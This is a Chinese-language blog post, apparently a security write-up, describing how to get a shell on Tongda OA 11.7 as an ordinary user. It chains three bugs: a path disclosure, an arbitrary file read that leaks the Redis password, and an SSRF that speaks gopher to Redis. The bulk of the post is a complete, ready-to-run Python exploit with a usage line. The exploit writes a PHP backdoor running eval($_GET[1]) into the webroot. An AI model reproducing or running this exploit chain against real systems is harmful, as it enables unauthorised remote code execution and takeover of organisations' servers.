通达OA 后台getshell 新思路
之前碰到一个是后台sql 没办法写入文件。然后对于普通用户的情况下。如何getshell 这里通过三个小漏洞的结合导致的一个getshell
这里使用的是通达OA 11.7 最新版。下载地址如下:https://www.tongda2000.com/download/p2019.php?F=baidu_natural&K=
1.获取安装目录
/general/approve_center/archive/getTableStruc.php
首先是任意文件读取
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2读取到redis 密码。然后通过ssrf
/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/最后面写了一个python# -*- coding:utf-8 -*- import os import requests import re # author :print("") import urllib class GenerateUrl: def __init__(self, password, webroot, filename): self.password = password self.webroot = webroot self.filename = filename self.webshell = ''' <?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?> ''' self.template = '''_*2 $4 AUTH ${password_len} {password} *1 $8 flushall *4 $6 CONFIG $3 SET $10 dbfilename ${filename_len} {filename} *4 $6 CONFIG $3 SET $3 dir ${webroot_len} {webroot} *3 $3 SET $1 1 ${content_len} {content} *1 $4 save *1 $4 quit ''' def __str__(self): webshell = self.webshell webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c") webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<','%3c').replace('?', '%3f').replace('>', '%3e') self.template = self.template.replace("{password_len}", str(len(self.password))) self.template = self.template.replace("{password}", self.password) self.template = self.template.replace("{filename_len}", str(len(self.filename))) self.template = self.template.replace("{filename}", self.filename) self.template = self.template.replace("{webroot_len}", str(len(self.webroot))) self.template = self.template.replace("{webroot}", self.webroot) self.template = self.template.replace("{content_len}", str(len(self.webshell))) self.template = self.template.replace("{content}", webshell) self.template = self.template.replace('\n', '%0D%0A') return urllib.quote_plus(self.template) proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", } def headers(phpsesion): return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ", "Cookie":phpsesion } #获取绝对目录 def get_path(url,headers): urlc=url url=(url+'/general/approve_center/archive/getTableStruc.php') try: data=requests.get(url=url,headers=headers,proxies=proxies).json() path=data['logPath'].split('\\')[0] url2=urlc+'/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2'%path data2 = requests.get(url=url2, headers=headers, proxies=proxies) ress=re.search('requirepass .+',data2.text).group() return {"path":path,"redis_pass":ress.replace('requirepass ','').strip()} except: exit('ERROR Cookie PHPSESSID expired') #ssrf写入文件 def ssrf_webshell(url,path,password): urlc=url path=path password=password a = GenerateUrl(password, path+"/webroot/", "666.php") url=url+'/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s'%('gopher://127.0.0.1:6399/' + str(a)) data = requests.get(url=url, headers=headers, proxies=proxies) ddd=requests.get(url=urlc+'/666.php') if ddd.status_code==200: print('shell url:%s'%urlc+'/666.php') else: print('send shell ERROR') return True if __name__ == '__main__': import sys try: url=sys.argv[1] cookie=sys.argv[2] headers=headers(cookie) root_path=get_path(url,headers) ssrf_webshell(url,root_path['path'],root_path['redis_pass']) except: print('python tongda.py http://127.0.0.1 PHPSESSID=9n6bc6pfcmj9ju4r3j7o0c6gg7')执行方式
python tongda.py http://127.0.0.1 PHPSESSID=9n6bc6pfcmj9ju4r3j7o0c6gg7